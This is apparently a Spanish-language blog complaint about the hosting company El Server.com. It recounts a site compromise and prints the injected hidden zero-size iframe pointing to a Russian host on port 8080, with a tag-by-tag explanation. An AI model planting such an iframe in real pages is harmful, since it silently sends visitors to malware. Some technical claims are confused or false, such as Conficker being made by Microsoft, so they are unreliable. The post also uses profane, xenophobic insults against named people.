El Server.com, atrae usuarios con su política de Distribución de contenidos, promociones a clientes duplicando el espacio y una supuesta tecnología Grid, que no la tienen, y además no tienen servidores propios, alquilan un Datacenter para almacenar a los clientes.
En primer lugar quiero aclarar que, acordamos el abono mensual de Hosting por debito automático y el dominio al contado por PagoFacil. Me enviaron la factura para imprimir del primer mes de hosting y no la del dominio, que igualmente me la habilitaron, y el debito comenzó a partir del segundo mes.
Con este comienzo, ustedes se darán cuenta de la pésima organización y administración que llevan los pendejos de Joel Alan Chornik y compañía.
A fines de Agosto llame por teléfono para saber que problema había porque no podía acceder a mi servidor por FTP, me pidieron que les envíe por el mail de soporte los datos de acceso para ver si pueden entrar…se los envíe, confié en su seguridad y responsabilidad…y pude entrar.
Después de un viaje, 15 días después intente acceder por FTP, el mismo problema, y encima al entrar a mi Sitio el AVG 8.5 me advirtió del virus HTML/Framer, me canse de llamar por dos días consecutivos y no me atendían, cuando lo hacían me volvían a pedir los datos de acceso o que me comunique con soporte, el puto soporte que no existe, si ellos no están trabajando allí. Terminamos en una fuerte, controversial y escandalosa discusión por el problema surgido.
El Virus
El maldito virus es una explotación de archivo en html que incluye otro archivo html, mediante la etiqueta Include, que incluye una pagina dentro de la misma, de manera invisible.
El Sitio fue victima de un ataque llamado XSS Directo, el Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado. Según en la Wikipedia funciona localizando puntos débiles en la programación de los filtros de HTML, para publicar contenido (como blogs, foros, etc.). En este caso un Sitio Web invisible.
Normalmente el atacante tratara de insertar tags como <iframe>, o <script>, pero en caso de fallar, el atacante puede tratar de poner tags que casi siempre están permitidas y es poco conocida su capacidad de ejecutar código. De esta forma el atacante podría ejecutar código malicioso.
El código entro y se permaneció inerte afectando todos los PC clientes que visitaran mi sitio, incluido el servidor mismo en donde estaba alojado (un gran punto en contra del El Server)
El Código
La línea de código que ejecuta el comando iframe es de un falso sitio de Renault de origen ruso, que me conectaba al puerto 8080. Este código es el siguiente:
<div style="display:none"><iframe src=http://red-wolf.ru:8080/index. php width= "0" height= "0" scrolling="auto" frameborder= "1" transparency></iframe></div>
Analizando el comportamiento del código, se representa de la siguiente manera:
<div style="display:none">
Es la etiqueta DIV con el parametro de visualizacion del contenido de otra pagina web, en este caso esta deshabilitada
<iframe src=http://red-wolf.ru:8080/index.php
El Sitio web de comunicación en el puerto 8080, estableciendo una conexión remota
width= "0" height= "0" scrolling="auto" frameborder= "1" transparency>
El tamaño, el borde y el fondo transparente del sitio para que no se vea.
</iframe></div>
Cierre de ambas etiquetas
De esta manera cada PC que visitara mi sitio se conectaba al Sitio de los hijos, nietos y madres de re mil conteiner de prostitutas baratas rusos comunistas! Sin que el usuario lo supiera, si se tiene Firefox, Chrome o ningún antivirus bueno es presa fácil, convirtiéndose en un BootPC, conexión remota, o una PC Zoombie, dejando que el mercenario entrase a nuestros discos duros, al escritorio, a los documentos y hasta cualquier cosa que se conecte por USB.
Finalmente limpie mi maquina, elimine el virus y el gusano Confiker realizado por Microsoft que se filtro y por WebFTP borre todos mis archivos del Sitio y me di de baja al hosting.
Tomen bien en cuenta y conozcan todos los casos de éxito y fracaso de todos los hosting antes de contratar a uno.